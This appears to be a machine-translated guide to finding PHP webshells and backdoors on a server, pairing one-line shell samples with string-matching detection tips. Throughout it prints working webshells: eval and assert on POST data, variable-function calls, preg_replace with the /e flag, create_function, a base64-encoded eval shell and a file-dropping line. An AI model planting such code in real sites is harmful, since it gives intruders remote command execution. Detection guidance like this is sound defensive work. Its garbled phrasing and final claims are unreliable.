How to find php Trojan Horse and Backdoor

Elementary: http://www.bkjia.com/Article/201405/304549.html


<? Php eval ($ _ POST [xiao])?> # Eval is not common in normal programming. You can use string matching to find eval.

It is common to become

Base64_decode (PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4 =) # matches the base64_decode. Find the file and view the file content.

This form can be bypassed, and there are other forms

<? Php $ _ GET ['eval'] ($ _ POST ['xiao']);?> # If eval appears in a file or $ _ GET $ _ POST appears in the file, the output file location if (key ($ _ GET) = 'singyea ') call_user_func ($ _ GET ['singyea'], $ _ POST ['singyea ']); <? Php $ _ GET ['a'] ($ _ POST ['B']);?> # Which of the following are relatively simple test. php? A = assert

Password B

<? Php assert ($ _ POST [s]);?> # Directly match assert <? Php $ _ POST ['iso '] ($ _ POST ['cmd']);?> # Match the direct output file location with two posts in the file

Enter the password cmd kitchen knife configuration information: <O> iso = assert </O

Preg_replace ("/[pageerror]/e", $ _ POST ['error'], "saft "); # In this case, both preg_replace and POST in the same file directly output the file location and then manually find @ preg_replace ("~ (.*)~ Ies ", gzuncompress ($ _ SESSION ['api ']), null); same matching method as above <? Php $ a = str_replace (x, "", "axsxxsxexrxxt"); $ a ($ _ POST ["sz"]);? $ S = create_function ('', $ _ REQUEST ['C']); $ s (); // s. php? C = eval % 28 $ _ REQUEST [cmd] % 29; & cmd = echo % 201;?> <? Php file_put_contents (base64_decode (file name), base64_decode (pony base64);?>

To scan and kill a webshell statement, you only need to find the above basic solution.

Then there are some functions such as fread, fwrite, mkdir, system, eval, and basename for the Trojan horse. You can check the php filesystem function. If there is a function matching, can the code be saved?

The last one is to find the fsocket and socket functions.

This is the function ddos used to check the traffic.